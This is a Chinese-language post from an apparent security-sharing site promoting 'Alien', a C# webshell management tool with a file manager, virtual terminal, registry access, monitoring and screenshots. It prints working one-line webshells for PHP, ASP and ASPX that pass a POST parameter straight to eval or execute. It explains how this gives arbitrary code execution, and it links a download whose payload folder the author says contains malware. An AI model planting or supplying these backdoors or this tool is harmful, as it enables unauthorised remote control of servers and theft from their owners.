标题 简介 类型 公开时间
关联规则 关联知识 关联工具 关联文档 关联抓包
参考1(官网)
参考2
参考3
详情
[SAFE-ID: JIWO-2024-3343]   作者: 小螺号 发表于: [2023-09-24]

本文共 [70] 位读者顶过

项目简介

语言

C# .NET Framework V4.8

功能

  • File Manager (可显示图片, 可SearchFile)

  • 虚拟终端

  • 数据库

  • 注册表

  • 监控

  • 截图

  • 系统信息

项目描述

一句话木马

一句话木马是在渗透测试中用来控制服务器的工具[出自:jiwo.org]
强大之处在于木马本身体积小,不易发现
以下是最简单的一句话木马

PHP <?php @eval($_POST['password']);?>
ASP <%execute(request("password"))%>
ASPX <%@ Page Language="Jscript"%><%eval(Request.Item["password"])%>当然, Alien还可以使用asmx, ashx等等的Webshell。
NodeJS和JSP https://github.com/malbuffer4pt/Alien/blob/main/shell.txt

关于JSP webshell

目前只有比较原始的菜刀版本, 之后可能会加上蚁剑和冰蝎
shell有进行更改, 新增了可以显示图片的功能

关于NodeJS webshell

由于NodeJS特性, 原理跟一般php asp aspx等动态语言的shell不同,  
NodeJS目的重在管理而非渗透

伺服器

Windows, Linux, Unix, MacOS

Database管理

MySQL :PHP

交通 :https://github.com/malbuffer4pt/DBer

SQL Server :ASP ASPX ASMX ASHX


原理

以PHP为例子, eval()可以把string以PHP Code去执行,
如果eval()中带有可控变量,那么就可以执行任意代码。 
如eval($_POST['a']);
HTTP POST a=phpinfo(); 就可以执行phpinfo();

注意!

  • 工具Payloads文件夹内有符合恶意程序的Payload, 可能会被防毒删除

  • 目前只有删减版,但部份代码没有删除,Disassemble应该会有奇怪但无法使用的东西

图片




项目地址:https://github.com/malbuffer4pt/Alien

网盘下载地址链接:https://pan.quark.cn/s/a3270016801d

评论

暂无
发表评论
 返回顶部 
热度(70)
 关注微信